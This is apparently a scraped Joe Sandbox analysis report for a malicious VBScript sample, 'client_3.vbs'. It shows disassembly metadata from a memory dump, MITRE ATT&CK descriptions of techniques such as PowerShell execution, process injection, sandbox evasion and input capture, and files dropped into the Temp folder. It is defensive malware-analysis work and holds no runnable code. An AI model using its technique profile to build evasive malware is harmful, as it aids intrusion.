GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00C7BA71

Strings

SetDefaultDllDirectories, xrefs: 00C7BA6B
kernel32.dll, xrefs: 00C7BA55

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: AddressProc
String ID: SetDefaultDllDirectories$kernel32.dll
API String ID: 190572456-2102062458
Opcode ID: cf628fbd510600dcd6e16c4f17ee6ba5ab5839518ad519cd081b6619f3c0cea8
Instruction ID: 6cd3df34f1015f656be055232c308f1d4ec08357444a501d828eb70d96995d4f
Opcode Fuzzy Hash: cf628fbd510600dcd6e16c4f17ee6ba5ab5839518ad519cd081b6619f3c0cea8
Instruction Fuzzy Hash: B3E065786057038FDF1EAF6AA85573531506711325B14913DA41FC1B90EB608F05F925

Uniqueness

Uniqueness Score: -1.00%

Function 00CA6800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?), ref: 00CA683C

Strings

/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/handle-io.c, xrefs: 00CA680F
h->type == HT_INPUT, xrefs: 00CA6814

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Event
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/handle-io.c$h->type == HT_INPUT
API String ID: 4201588131-4276633855
Opcode ID: fd4f6e90a08588b11c6ff377fa87fb06af253b16c2171d9a72bc7717d899c63c
Instruction ID: 92d93b2da6eafb587ea0e5b94d971c357840363c54e34e504776974c4e9ec433
Opcode Fuzzy Hash: fd4f6e90a08588b11c6ff377fa87fb06af253b16c2171d9a72bc7717d899c63c
Instruction Fuzzy Hash: 00E09270808381AEEB315A24A80D392BFE4AB02329F09486DF4E5111D283B86DCCCBD2

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report client_3.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Other

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5r34s5rb.nu4.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pzmkbj2i.03h.psm1

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Proxied Packets

Statistics

CPU Usage

Windows Analysis Report
client_3.vbs

Function 00C44740 Relevance: 47.4, APIs: 12, Strings: 15, Instructions: 109
libraryloaderregistryCOMMON

Function 00CA7050 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 94
libraryloaderCOMMON

Function 00C74DA0 Relevance: 138.6, APIs: 40, Strings: 39, Instructions: 372
libraryloadernetworkCOMMON

Function 00C5D920 Relevance: 65.4, APIs: 28, Strings: 9, Instructions: 605
windowtimeCOMMON

Function 00C88240 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 88
windowregistryCOMMON

Function 00C5F910 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
windowCOMMON

Function 00C5F310 Relevance: 7.5, APIs: 5, Instructions: 31
COMMON

Function 00C63330 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 84
windowCOMMON

Function 00C64450 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27
libraryloaderCOMMON

Function 00C7BC00 Relevance: 6.1, APIs: 4, Instructions: 72
registryCOMMON

Function 00C5D6E0 Relevance: 6.0, APIs: 4, Instructions: 17
COMMON

Function 00C63780 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88
COMMON

Function 00C63280 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70
windowCOMMON

Function 00C63020 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55
COMMON

Function 00CF62C4 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE